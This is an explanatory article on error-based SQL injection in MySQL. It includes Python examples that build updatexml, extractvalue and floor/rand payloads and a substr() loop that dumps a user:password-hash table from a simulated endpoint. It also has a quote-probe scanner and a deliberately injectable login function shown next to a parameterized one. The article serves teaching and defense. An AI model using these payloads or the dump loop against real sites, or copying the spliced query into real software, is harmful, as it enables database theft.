Error-Based SQL injection constructs input that makes the database raise an error, then reads sensitive data out of the error message. The attacker relies on user input that reaches the query without being filtered or escaped, and uses it to make the application reveal the database's structure or contents. Common techniques use MySQL functions such as updatexml(), extractvalue() and floor() to trigger errors whose text carries data the attacker chose. The usual detection method is to append a quote to a parameter and watch for a SQL syntax error in the response. Defenses include parameterized queries, input filtering and escaping, disabling detailed error output in production, and deploying a web application firewall.
Error-based SQL injection is, in most cases, the result of user input reaching a query without being filtered or escaped. The attack uses the information the database returns when a query fails to obtain sensitive data and, in some cases, to gain control of the database. It should never be used for malicious purposes, but understanding how it works and how to prevent it matters for both developers and security staff.

What is Error-Based SQL Injection
Simply put, in Error-Based SQL injection the attacker constructs special input that makes the application trigger a database error, then reads useful data from the error message, such as table names, column names or even the database version.
For example, if you type ' OR 1=1 -- into the login box and the system does no filtering, the single quote breaks out of the string literal in the query. Depending on how the rest of the statement is assembled, this either changes the statement's logic or produces a syntax error whose text can expose the database type and structure. That information leak is the first step of the attack.

Common error injection methods
There are many ways to trigger an error. A common one is to exploit several MySQL functions, such as updatexml(), extractvalue() and floor(), that throw an error message when given malformed arguments. Because the injected statement controls those arguments, it also controls what ends up in the message.
Here are some typical examples:

- updatexml(1, concat('~', (select database()), '~'), 1) triggers an XPath syntax error, and the error message displays the current database name because the concatenated value is not valid XPath.
- extractvalue() is used the same way, with slightly different syntax.
- floor(rand(0)*2) combined with group by produces a duplicate key error, which exposes the subquery result embedded in the duplicated key.

The core idea of all these methods is to make the database "spray" information that users were never meant to see.
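The following is an added example, not code from the original article: it builds the three MySQL payload shapes listed above, pulls the leaked value back out of the resulting error text, and shows why a real dump needs substr() windows. updatexml() and extractvalue() only echo about 32 characters of the bad XPath expression, so longer values have to be read in pieces. The table and column names, the SECRET value, the md5 hashes and the fake_server stand-in are all constructed for illustration.

```python
import re

# Added example (not from the original article). MySQL shows only about 32
# characters of the offending XPath expression, so each request reads one
# window of the target value; the two '~' delimiters use up 2 of those.
CHUNK = 30


def updatexml_payload(subquery, offset=1, chunk=CHUNK):
    """Fragment that leaks substr(subquery, offset, chunk) via updatexml()'s
    XPath syntax error. Assumes the parameter sits inside a single-quoted literal."""
    return (f"' AND updatexml(1, concat('~', substr(({subquery}), {offset}, {chunk}), '~'), 1) -- ")


def extractvalue_payload(subquery, offset=1, chunk=CHUNK):
    """Same trick through extractvalue(), which takes two arguments."""
    return (f"' AND extractvalue(1, concat('~', substr(({subquery}), {offset}, {chunk}), '~')) -- ")


def floor_payload(subquery):
    """Duplicate-entry trick: floor(rand(0)*2) with GROUP BY makes the same key
    appear twice, and the duplicate key error echoes the subquery value."""
    return (f"' AND (SELECT 1 FROM (SELECT count(*), concat('~', ({subquery}), '~', "
            f"floor(rand(0)*2)) AS x FROM information_schema.tables GROUP BY x) AS t) -- ")


# Error formats as MySQL reports them for the payloads above (constructed samples):
#   XPATH syntax error: '~testdb~'
#   Duplicate entry '~testdb~1' for key 'group_key'
_LEAK_PATTERNS = [
    re.compile(r"XPATH syntax error: '~(.*?)~'"),
    re.compile(r"Duplicate entry '~(.*?)~\d' for key"),
]


def extract_leaked(error_text):
    """Return the value carried inside a crafted MySQL error, or None."""
    for pat in _LEAK_PATTERNS:
        m = pat.search(error_text)
        if m:
            return m.group(1)
    return None


def read_all(subquery, run):
    """Dump a value longer than one window by sliding substr()'s offset.
    `run(payload)` is caller-supplied: it sends the payload and returns the raw
    error text (a real tool would do an HTTP request; here a simulator is used)."""
    out, offset = "", 1
    while True:
        piece = extract_leaked(run(updatexml_payload(subquery, offset)))
        if not piece:          # empty window: nothing left (or no error came back)
            break
        out += piece
        if len(piece) < CHUNK:  # short window means we reached the end
            break
        offset += CHUNK
    return out


# Constructed secret (two users with md5 hashes) that the fake endpoint "holds".
SECRET = "admin:5f4dcc3b5aa765d61d8327deb882cf99,alice:e10adc3949ba59abbe56e057f20f883e"


def fake_server(payload):
    """Constructed stand-in for a vulnerable endpoint: parses the substr() window
    out of the payload and answers with the error MySQL would produce."""
    m = re.search(r"substr\(\(.*?\), (\d+), (\d+)\)", payload)
    offset, chunk = int(m.group(1)), int(m.group(2))
    window = SECRET[offset - 1: offset - 1 + chunk]
    return f"XPATH syntax error: '~{window}~'"


if __name__ == "__main__":
    print(read_all("select group_concat(name,0x3a,pw) from users", fake_server))
```

The `0x3a` in the sample subquery is the usual way to get a ':' separator without putting another quote into the payload, which matters when the application escapes quotes but not the rest of the input.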
How to detect whether there is an error injection vulnerability
To determine whether an interface has an error injection point, the usual approach is to append a single quote ' or a double quote " to the parameter and see whether a database error message comes back.
If something like the following is returned:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
it is almost certain that error-based injection is possible on this interface. A useful confirmation is to send two quotes '' instead of one: if the error disappears, the quote really is landing inside a string literal.
You can then splice in one of the error-reporting functions to see whether it returns the database's internal information. Note that the absence of an error message does not rule out injection; it only means the error-based technique will not work and blind techniques are needed instead.
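As an added example (not part of the original article), the detection step above expressed as code: a quote probe that sends the baseline value, the value plus one quote and the value plus two quotes, then fingerprints the database from well-known driver error strings. The signature list is deliberately short, the HTTP layer is replaced by a caller-supplied `send` function, and both fake endpoints and all response bodies are constructed samples.

```python
import re

# Added example, not from the original article. Only a few well-known error
# strings per database are listed; a real scanner carries many more.
DB_ERROR_SIGNATURES = {
    "MySQL": [
        r"You have an error in your SQL syntax",
        r"Warning: mysqli?_",
        r"MySQLSyntaxErrorException",
    ],
    "PostgreSQL": [
        r"unterminated quoted string at or near",
        r"pg_query\(\)",
    ],
    "Microsoft SQL Server": [
        r"Unclosed quotation mark after the character string",
        r"Incorrect syntax near",
    ],
    "Oracle": [
        r"ORA-\d{5}",
        r"quoted string not properly terminated",
    ],
    "SQLite": [
        r"unrecognized token",
        r"sqlite3\.OperationalError",
    ],
}

_COMPILED = {db: [re.compile(p, re.I) for p in pats]
             for db, pats in DB_ERROR_SIGNATURES.items()}


def fingerprint_error(body):
    """Return the DBMS whose error signature appears in the response body, else None."""
    for db, pats in _COMPILED.items():
        if any(p.search(body) for p in pats):
            return db
    return None


def probe(value, send):
    """Quote-probe one parameter. `send(value)` submits the value and returns the
    response body (here a constructed simulator; a real tool would do HTTP).
    Three requests: baseline, one quote (unbalanced, should break the query),
    two quotes (balanced inside a string literal, should not)."""
    baseline = send(value)
    one_quote = send(value + "'")
    two_quotes = send(value + "''")
    dbms = fingerprint_error(one_quote)
    candidate = (
        dbms is not None
        and fingerprint_error(baseline) is None      # the error is caused by our quote
        and fingerprint_error(two_quotes) is None    # and goes away when balanced
    )
    return {"dbms": dbms, "error_based_candidate": candidate}


def fake_app_verbose(value):
    """Constructed endpoint: splices `value` into a quoted literal and echoes the
    raw MySQL error whenever the quotes do not balance."""
    if value.count("'") % 2 == 1:
        return ("<html>Warning: mysqli_query(): You have an error in your SQL syntax; "
                "check the manual ... near ''' at line 1</html>")
    return "<html><h1>Products</h1><p>3 items</p></html>"


def fake_app_silent(value):
    """Same bug, but detailed errors are turned off: the page just degrades.
    The quote probe finds nothing, although the injection still exists and
    would have to be confirmed with blind techniques."""
    if value.count("'") % 2 == 1:
        return "<html><h1>Products</h1><p>0 items</p></html>"
    return "<html><h1>Products</h1><p>3 items</p></html>"


if __name__ == "__main__":
    print(probe("lamp", fake_app_verbose))
    print(probe("lamp", fake_app_silent))
```

The two-quote request is what separates a real string-literal injection point from a page that simply errors on odd input; a database that echoes an error for `'` but not for `''` is parsing your characters as SQL.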
How to defend against Error-Based injection
The key to defense is to prevent user input from being spliced directly into SQL statements. There are several commonly used methods:

- Use parameterized queries (Prepared Statements). This is the most recommended way: pass user input as bound parameters instead of splicing strings, so the database never parses the input as SQL.
- Filter and escape the input. For example, remove special characters, or use the escape function that comes with the framework. This is a supplementary layer, not a replacement for parameterization.
- Close detailed error prompts. Do not enable detailed database error output in production environments; log the details server-side and return a generic message, so that a query failure leaks nothing to the client.
- Use a Web Application Firewall (WAF). For example, ModSecurity can recognize common injection patterns and block them, which helps against automated scanning but can be bypassed by encoded or unusual payloads.
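The following is an added example, not code from the original article: the same login lookup written with string splicing and with a parameterized query, run against an in-memory SQLite database containing constructed users, plus an endpoint wrapper that hides the driver's error text from the client. The users, passwords and function names are all assumptions made for illustration; the SQLite error text differs from MySQL's but the mechanism is the same.

```python
import logging
import sqlite3

# Added example, not from the original article. Uses an in-memory SQLite
# database with constructed users so it runs offline.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users (name, pw) VALUES (?, ?)",
                     [("admin", "hunter2"), ("alice", "s3cret")])
    return conn


def login_vulnerable(conn, user, pw):
    """Deliberately unsafe: user input is spliced into the statement, so a quote
    either changes the logic (' OR 1=1 --) or breaks the parse (a lone ')."""
    sql = f"SELECT name FROM users WHERE name = '{user}' AND pw = '{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, pw):
    """Parameterized: the driver sends the values separately from the SQL text,
    so quotes in the input are just data and can never alter the statement."""
    row = conn.execute("SELECT name FROM users WHERE name = ? AND pw = ?",
                       (user, pw)).fetchone()
    return row[0] if row else None


def leaked_error(conn, user, pw):
    """What a verbose endpoint would show the attacker: the driver's own message."""
    try:
        login_vulnerable(conn, user, pw)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def handle_login(conn, user, pw, impl):
    """Endpoint wrapper for production: detailed errors go to the server log,
    the client only ever sees a generic failure."""
    try:
        return {"ok": impl(conn, user, pw) is not None, "error": None}
    except sqlite3.Error as exc:
        logging.getLogger(__name__).error("login query failed: %s", exc)
        return {"ok": False, "error": "login failed"}


if __name__ == "__main__":
    db = make_db()
    print("bypass via splicing:", login_vulnerable(db, "' OR 1=1 --", "x"))
    print("same input, parameterized:", login_safe(db, "' OR 1=1 --", "x"))
    print("error text a verbose page would leak:", leaked_error(db, "'", "x"))
    print("what the client should see instead:", handle_login(db, "'", "x", login_vulnerable))
```

Note that `login_safe` handles the lone quote without raising at all: there is nothing for the "close detailed errors" layer to hide once the query is parameterized, which is why that measure is defense in depth rather than the fix.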
That is basically it. Error-based injection looks technical, but as long as user input never reaches the query as raw string fragments, this kind of risk can be avoided entirely.